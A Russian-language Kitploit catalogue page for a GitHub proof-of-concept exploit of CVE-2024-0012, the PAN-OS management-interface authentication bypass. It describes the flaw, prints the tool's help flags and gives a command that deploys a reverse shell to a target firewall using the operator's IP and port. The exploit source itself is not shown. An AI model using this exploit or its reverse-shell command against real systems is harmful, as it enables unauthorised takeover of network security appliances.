Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-0012 — CVE-2024-0012 PAN-OS: Обход аутентификации в веб-интерфейсе управления (PAN-SA-2024-0015) RCE POC | Kitploit
Инструменты/GitHubGitHub/0xjessie21/cve-2024-0012
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеАутентификация
GitHub0xjessie21/cve-2024-0012

CVE-2024-0012

CVE-2024-0012 PAN-OS: Обход аутентификации в веб-интерфейсе управления (PAN-SA-2024-0015) RCE POC

Репозиторий
3131 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Python 3.x

CVE-2024-0012

CVE-2024-0012 — это обход аутентификации в программном обеспечении Palo Alto Networks PAN-OS, который позволяет неаутентифицированному злоумышленнику, имеющему сетевой доступ к веб-интерфейсу управления, получить привилегии администратора PAN-OS для выполнения административных действий, вмешательства в конфигурацию или эксплуатации других уязвимостей повышения привилегий с аутентификацией.

Скриншот

cve-2024-0012

❗ Отказ от ответственности
Этот проект в первую очередь предназначен для использования в качестве отдельного CLI-инструмента. Запуск этого эксплойта в качестве сервиса может представлять угрозу безопасности. Рекомендуется использовать с осторожностью и дополнительными мерами безопасности. DWYOR

Использование

root@kitploit:~
python3 cve-2024-0012.py -h

Это отобразит справку по инструменту. Вот все поддерживаемые параметры.

root@kitploit:~
Usage:
  python3 cve-2024-0012.py [flags]

Flags:
  -h, --help         show this help message and exit
  --url URL          Target base URL (http:// or https://)
  --no-verify        Disable SSL verification
  --timeout TIMEOUT  Request timeout in seconds
  --command COMMAND  Command to execute on the target
  --reverse-shell    Deploy a reverse shell to the target
  --lhost LHOST      Local host for reverse shell connection (required for reverse shell)
  --lport LPORT      Local port for reverse shell connection (required for reverse shell)

Команда обратной оболочки.

root@kitploit:~
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444
  • Замените 4444 на используемый вами порт.

Благодарности

  • Chirag Artani
  • Sachin Artani
  • Muhammad Mugni Abdul Gani
Скачать инструмент